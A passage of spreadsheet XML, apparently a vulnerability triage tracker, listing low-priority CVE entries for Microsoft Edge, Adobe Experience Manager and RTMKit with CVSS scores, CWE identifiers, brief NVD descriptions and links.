      <c r="N750" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O750" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="P750" s="5" t="inlineStr"/>
      <c r="Q750" s="5" t="inlineStr">
        <is>
          <t>CWE-352</t>
        </is>
      </c>
      <c r="R750" s="5" t="inlineStr">
        <is>
          <t>Subscriber Cross Site Request Forgery (CSRF) in RTMKit &lt;= 2.1.5 versions.</t>
        </is>
      </c>
      <c r="S750" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-62133</t>
        </is>
      </c>
    </row>
    <row r="751">
      <c r="A751" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B751" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C751" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-62904</t>
        </is>
      </c>
      <c r="D751" s="5" t="n">
        <v>5.4</v>
      </c>
      <c r="E751" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F751" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G751" s="5" t="inlineStr"/>
      <c r="H751" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I751" s="5" t="inlineStr"/>
      <c r="J751" s="5" t="inlineStr"/>
      <c r="K751" s="5" t="inlineStr">
        <is>
          <t>microsoft:edge_chromium</t>
        </is>
      </c>
      <c r="L751" s="5" t="inlineStr"/>
      <c r="M751" s="5" t="inlineStr"/>
      <c r="N751" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O751" s="5" t="inlineStr">
        <is>
          <t>2026-08-28</t>
        </is>
      </c>
      <c r="P751" s="5" t="inlineStr"/>
      <c r="Q751" s="5" t="inlineStr">
        <is>
          <t>CWE-863</t>
        </is>
      </c>
      <c r="R751" s="5" t="inlineStr">
        <is>
          <t>Incorrect authorization in Microsoft Edge (Chromium-based) allows an unauthorized attacker to disclose information over a network.</t>
        </is>
      </c>
      <c r="S751" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-62904</t>
        </is>
      </c>
    </row>
    <row r="752">
      <c r="A752" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B752" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C752" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-66323</t>
        </is>
      </c>
      <c r="D752" s="5" t="n">
        <v>5.4</v>
      </c>
      <c r="E752" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F752" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G752" s="5" t="inlineStr"/>
      <c r="H752" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I752" s="5" t="inlineStr"/>
      <c r="J752" s="5" t="inlineStr"/>
      <c r="K752" s="5" t="inlineStr">
        <is>
          <t>microsoft:edge_chromium</t>
        </is>
      </c>
      <c r="L752" s="5" t="inlineStr"/>
      <c r="M752" s="5" t="inlineStr"/>
      <c r="N752" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O752" s="5" t="inlineStr">
        <is>
          <t>2026-08-28</t>
        </is>
      </c>
      <c r="P752" s="5" t="inlineStr"/>
      <c r="Q752" s="5" t="inlineStr">
        <is>
          <t>CWE-141</t>
        </is>
      </c>
      <c r="R752" s="5" t="inlineStr">
        <is>
          <t>Improper neutralization of parameter/argument delimiters in Microsoft Edge (Chromium-based) allows an unauthorized attacker to execute code over a network.</t>
        </is>
      </c>
      <c r="S752" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-66323</t>
        </is>
      </c>
    </row>
    <row r="753">
      <c r="A753" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B753" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C753" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-71356</t>
        </is>
      </c>
      <c r="D753" s="5" t="n">
        <v>5.4</v>
      </c>
      <c r="E753" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F753" s="5" t="inlineStr">
        <is>
          <t>psirt@adobe.com</t>
        </is>
      </c>
      <c r="G753" s="5" t="inlineStr"/>
      <c r="H753" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I753" s="5" t="inlineStr"/>
      <c r="J753" s="5" t="inlineStr"/>
      <c r="K753" s="5" t="inlineStr">
        <is>
          <t>adobe:experience_manager</t>
        </is>
      </c>
      <c r="L753" s="5" t="inlineStr"/>
      <c r="M753" s="5" t="inlineStr"/>
      <c r="N753" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O753" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P753" s="5" t="inlineStr"/>
      <c r="Q753" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="R753"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53" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-71356</t>
        </is>
      </c>
    </row>
    <row r="754">
      <c r="A754" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B754" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C754" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-71357</t>
        </is>
      </c>
      <c r="D754" s="5" t="n">
        <v>5.4</v>
      </c>
      <c r="E754" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F754" s="5" t="inlineStr">
        <is>
          <t>psirt@adobe.com</t>
        </is>
      </c>
      <c r="G754" s="5" t="inlineStr"/>
      <c r="H754" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I754" s="5" t="inlineStr"/>
      <c r="J754" s="5" t="inlineStr"/>
      <c r="K754" s="5" t="inlineStr">
        <is>
          <t>adobe:experience_manager</t>
        </is>
      </c>
      <c r="L754" s="5" t="inlineStr"/>
      <c r="M754" s="5" t="inlineStr"/>
      <c r="N754" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O754" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P754" s="5" t="inlineStr"/>
      <c r="Q754" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="R754"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54" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-71357</t>
        </is>
      </c>
    </row>
    <row r="755">
      <c r="A755" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B755" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C755" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-71388</t>
        </is>
      </c>
      <c r="D755" s="5" t="n">
        <v>5.4</v>
      </c>
      <c r="E755" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F755" s="5" t="inlineStr">
        <is>
          <t>psirt@adobe.com</t>
        </is>
      </c>
      <c r="G755" s="5" t="inlineStr"/>
      <c r="H755" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I755" s="5" t="inlineStr"/>
      <c r="J755" s="5" t="inlineStr"/>
      <c r="K755" s="5" t="inlineStr">
        <is>
          <t>adobe:experience_manager</t>
        </is>
      </c>
      <c r="L755" s="5" t="inlineStr"/>
      <c r="M755" s="5" t="inlineStr"/>
      <c r="N755" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O755" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P755" s="5" t="inlineStr"/>
      <c r="Q755" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="R755"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55" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-71388</t>
        </is>
      </c>
    </row>
    <row r="756">
      <c r="A756" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B756" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C756" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-71440</t>
        </is>
      </c>
      <c r="D756" s="5" t="n">
        <v>5.4</v>
      </c>
      <c r="E756" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F756" s="5" t="inlineStr">
        <is>
          <t>psirt@adobe.com</t>
        </is>
      </c>
      <c r="G756" s="5" t="inlineStr"/>
      <c r="H756" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I756" s="5" t="inlineStr"/>
      <c r="J756" s="5" t="inlineStr"/>
      <c r="K756" s="5" t="inlineStr">
        <is>
          <t>adobe:experience_manager</t>
        </is>
      </c>
      <c r="L756" s="5" t="inlineStr"/>
      <c r="M756" s="5" t="inlineStr"/>
      <c r="N756" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O756" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P756" s="5" t="inlineStr"/>
      <c r="Q756" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="R756"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56" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-71440</t>
        </is>
      </c>
    </row>
    <row r="757">
      <c r="A757" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B757" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C757" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-71565</t>
        </is>
      </c>
      <c r="D757" s="5" t="n">
        <v>5.4</v>
      </c>
      <c r="E757" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F757" s="5" t="inlineStr">
        <is>
          <t>psirt@adobe.com</t>
        </is>
      </c>
      <c r="G757" s="5" t="inlineStr"/>
      <c r="H757" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I757" s="5" t="inlineStr"/>
      <c r="J757" s="5" t="inlineStr"/>
      <c r="K757" s="5" t="inlineStr">
        <is>
          <t>adobe:experience_manager</t>
        </is>
      </c>
      <c r="L757" s="5" t="inlineStr"/>
      <c r="M757" s="5" t="inlineStr"/>
      <c r="N757" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O757" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P757" s="5" t="inlineStr"/>
      <c r="Q757" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="R757"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57" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-71565</t>
        </is>
      </c>
    </row>
    <row r="758">
      <c r="A758" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B758" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C758" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-72626</t>
        </is>
      </c>
      <c r="D758" s="5" t="n">
        <v>5.4</v>
      </c>
      <c r="E758" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F758" s="5" t="inlineStr">
        <is>
          <t>psirt@adobe.com</t>
        </is>
      </c>
      <c r="G758" s="5" t="inlineStr"/>
      <c r="H758" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I758" s="5" t="inlineStr"/>
      <c r="J758" s="5" t="inlineStr"/>
      <c r="K758" s="5" t="inlineStr">
        <is>
          <t>adobe:experience_manager</t>
        </is>
      </c>
      <c r="L758" s="5" t="inlineStr"/>
      <c r="M758" s="5" t="inlineStr"/>
      <c r="N758" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O758" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P758" s="5" t="inlineStr"/>
      <c r="Q758" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="R758"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58" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-72626</t>
        </is>
      </c>
    </row>
    <row r="759">
      <c r="A759" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B759" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C759" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-72627</t>
        </is>
      </c>
      <c r="D759" s="5" t="n">
        <v>5.4</v>
      </c>
      <c r="E759" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F759" s="5" t="inlineStr">
        <is>
          <t>psirt@adobe.com</t>
        </is>
      </c>
      <c r="G759" s="5" t="inlineStr"/>
      <c r="H759" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I759" s="5" t="inlineStr"/>
      <c r="J759" s="5" t="inlineStr"/>
      <c r="K759" s="5" t="inlineStr">
        <is>
          <t>adobe:experience_manager</t>
        </is>
      </c>
      <c r="L759" s="5" t="inlineStr"/>
      <c r="M759" s="5" t="inlineStr"/>
      <c r="N759" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O759" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P759" s="5" t="inlineStr"/>
      <c r="Q759" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="R759"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59" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-72627</t>
        </is>
      </c>
    </row>
    <row r="760">
      <c r="A760" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B760" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C760" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-75629</t>
        </is>
      </c>
      <c r="D760" s="5" t="n">
        <v>5.4</v>
      </c>
      <c r="E760" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F760" s="5" t="inlineStr">
        <is>
          <t>psirt@adobe.com</t>
        </is>
      </c>
      <c r="G760" s="5" t="inlineStr"/>
      <c r="H760" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I760" s="5" t="inlineStr"/>
      <c r="J760" s="5" t="inlineStr"/>
      <c r="K760" s="5" t="inlineStr">
        <is>
          <t>adobe:experience_manager</t>
        </is>
      </c>
      <c r="L760" s="5" t="inlineStr"/>
      <c r="M760" s="5" t="inlineStr"/>
      <c r="N760" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O760" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P760" s="5" t="inlineStr"/>
      <c r="Q760" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="R760"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60" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-75629</t>
        </is>
      </c>
    </row>
    <row r="761">
      <c r="A761" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B761" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C761" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-75635</t>
        </is>
      </c>
      <c r="D761" s="5" t="n">
        <v>5.4</v>
      </c>
      <c r="E761" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F761" s="5" t="inlineStr">
        <is>
          <t>psirt@adobe.com</t>
        </is>
      </c>
      <c r="G761" s="5" t="inlineStr"/>
      <c r="H761" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I761" s="5" t="inlineStr"/>
      <c r="J761" s="5" t="inlineStr"/>
      <c r="K761" s="5" t="inlineStr">
        <is>
          <t>adobe:experience_manager</t>
        </is>
      </c>
      <c r="L761" s="5" t="inlineStr"/>
      <c r="M761" s="5" t="inlineStr"/>
      <c r="N761" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O761" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P761" s="5" t="inlineStr"/>
      <c r="Q761" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="R761"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61" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-75635</t>
        </is>
      </c>
    </row>
    <row r="762">
      <c r="A762" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B762" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C762" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-75636</t>
        </is>
      </c>
      <c r="D762" s="5" t="n">
        <v>5.4</v>
      </c>
      <c r="E762" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F762" s="5" t="inlineStr">
        <is>
          <t>psirt@adobe.com</t>
        </is>
      </c>
      <c r="G762" s="5" t="inlineStr"/>
      <c r="H762" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I762" s="5" t="inlineStr"/>
      <c r="J762" s="5" t="inlineStr"/>
      <c r="K762" s="5" t="inlineStr">
        <is>
          <t>adobe:experience_manager</t>
        </is>
      </c>
      <c r="L762" s="5" t="inlineStr"/>
      <c r="M762" s="5" t="inlineStr"/>
      <c r="N762" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O762" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P762" s="5" t="inlineStr"/>
      <c r="Q762" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="R762"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62" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-75636</t>
        </is>
      </c>
    </row>
    <row r="763">
      <c r="A763" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B763" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C763" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-75637</t>
        </is>
      </c>
      <c r="D763" s="5" t="n">
        <v>5.4</v>
      </c>
      <c r="E763" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F763" s="5" t="inlineStr">
        <is>
          <t>psirt@adobe.com</t>
        </is>
      </c>
      <c r="G763" s="5" t="inlineStr"/>
      <c r="H763" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I763" s="5" t="inlineStr"/>
      <c r="J763" s="5" t="inlineStr"/>
      <c r="K763" s="5" t="inlineStr">
        <is>
          <t>adobe:experience_manager</t>
        </is>
      </c>
      <c r="L763" s="5" t="inlineStr"/>
      <c r="M763" s="5" t="inlineStr"/>
      <c r="N763" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O763" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P763" s="5" t="inlineStr"/>
      <c r="Q763" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="R763"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63" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-75637</t>
        </is>
      </c>
    </row>
    <row r="764">
      <c r="A764" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B764" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C764" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-75639</t>
        </is>
      </c>
      <c r="D764" s="5" t="n">
        <v>5.4</v>
      </c>
      <c r="E764" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F764" s="5" t="inlineStr">
        <is>
          <t>psirt@adobe.com</t>
        </is>
      </c>
      <c r="G764" s="5" t="inlineStr"/>
      <c r="H764" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I764" s="5" t="inlineStr"/>
      <c r="J764" s="5" t="inlineStr"/>
      <c r="K764" s="5" t="inlineStr">
        <is>
          <t>adobe:experience_manager</t>
        </is>
      </c>
      <c r="L764" s="5" t="inlineStr"/>
      <c r="M764" s="5" t="inlineStr"/>
      <c r="N764" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O764" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P764" s="5" t="inlineStr"/>
      <c r="Q764" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="R764"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64" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-75639</t>
        </is>
      </c>
    </row>
    <row r="765">
      <c r="A765" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B765" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C765" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-75640</t>
        </is>
      </c>
      <c r="D765" s="5" t="n">
        <v>5.4</v>
      </c>
      <c r="E765" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F765" s="5" t="inlineStr">
        <is>
          <t>psirt@adobe.com</t>
        </is>
      </c>
      <c r="G765" s="5" t="inlineStr"/>
      <c r="H765" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I765" s="5" t="inlineStr"/>
      <c r="J765" s="5" t="inlineStr"/>
      <c r="K765" s="5" t="inlineStr">
        <is>
          <t>adobe:experience_manager</t>
        </is>
      </c>
      <c r="L765" s="5" t="inlineStr"/>
      <c r="M765" s="5" t="inlineStr"/>
      <c r="N765" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O765" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P765" s="5" t="inlineStr"/>
      <c r="Q765" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="R765"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65" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-75640</t>
        </is>
      </c>
    </row>
    <row r="766">
      <c r="A766" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B766" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C766" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-75642</t>
        </is>
      </c>
      <c r="D766" s="5" t="n">
        <v>5.4</v>
      </c>
      <c r="E766" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F766" s="5" t="inlineStr">
        <is>
          <t>psirt@adobe.com</t>
        </is>
      </c>
      <c r="G766" s="5" t="inlineStr"/>
      <c r="H766" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I766" s="5" t="inlineStr"/>
      <c r="J766" s="5" t="inlineStr"/>
      <c r="K766" s="5" t="inlineStr">
        <is>
          <t>adobe:experience_manager</t>
        </is>
      </c>
      <c r="L766" s="5" t="inlineStr"/>
      <c r="M766" s="5" t="inlineStr"/>
      <c r="N766" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O766" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P766" s="5" t="inlineStr"/>
      <c r="Q766" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="R766"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66" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-75642</t>
        </is>
      </c>
    </row>
    <row r="767">
      <c r="A767" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B767" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C767" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-75643</t>
        </is>
      </c>
      <c r="D767" s="5" t="n">
        <v>5.4</v>
      </c>
      <c r="E767" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F767" s="5" t="inlineStr">
        <is>
          <t>psirt@adobe.com</t>
        </is>
      </c>
      <c r="G767" s="5" t="inlineStr"/>
      <c r="H767" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I767" s="5" t="inlineStr"/>
      <c r="J767" s="5" t="inlineStr"/>
      <c r="K767" s="5" t="inlineStr">
        <is>
          <t>adobe:experience_manager</t>
        </is>
      </c>
      <c r="L767" s="5" t="inlineStr"/>
      <c r="M767" s="5" t="inlineStr"/>
      <c r="N767" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O767" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P767" s="5" t="inlineStr"/>
      <c r="Q767" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="R767"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67" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-75643</t>
        </is>
      </c>
    </row>
    <row r="768">
      <c r="A768" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B768" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C768" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-75644</t>
        </is>
      </c>
      <c r="D768" s="5" t="n">
        <v>5.4</v>
      </c>
      <c r="E768" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F768" s="5" t="inlineStr">
        <is>
          <t>psirt@adobe.com</t>
        </is>
      </c>
      <c r="G768" s="5" t="inlineStr"/>
      <c r="H768" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I768" s="5" t="inlineStr"/>
      <c r="J768" s="5" t="inlineStr"/>
      <c r="K768" s="5" t="inlineStr">
        <is>
          <t>adobe:experience_manager</t>
        </is>
      </c>
      <c r="L768" s="5" t="inlineStr"/>
      <c r="M768" s="5" t="inlineStr"/>
      <c r="N768" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O768" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P768" s="5" t="inlineStr"/>
      <c r="Q768" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="R768"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68" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-75644</t>
        </is>
      </c>
    </row>
    <row r="769">
      <c r="A769" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B769" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C769" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-75646</t>
        </is>
      </c>
      <c r="D769" s="5" t="n">
        <v>5.4</v>
      </c>
      <c r="E769" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F769" s="5" t="inlineStr">
        <is>
          <t>psirt@adobe.com</t>
        </is>
      </c>
      <c r="G769" s="5" t="inlineStr"/>
      <c r="H769" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I769" s="5" t="inlineStr"/>
      <c r="J769" s="5" t="inlineStr"/>
      <c r="K769" s="5" t="inlineStr">
        <is>
          <t>adobe:experience_manager</t>
        </is>
      </c>
      <c r="L769" s="5" t="inlineStr"/>
      <c r="M769" s="5" t="inlineStr"/>
      <c r="N769" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O769" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P769" s="5" t="inlineStr"/>
      <c r="Q769" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="R769"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69" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-75646</t>
        </is>
      </c>
    </row>
    <row r="770">
      <c r="A770" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B770" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C770" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-75647</t>
        </is>
      </c>
      <c r="D770" s="5" t="n">
        <v>5.4</v>
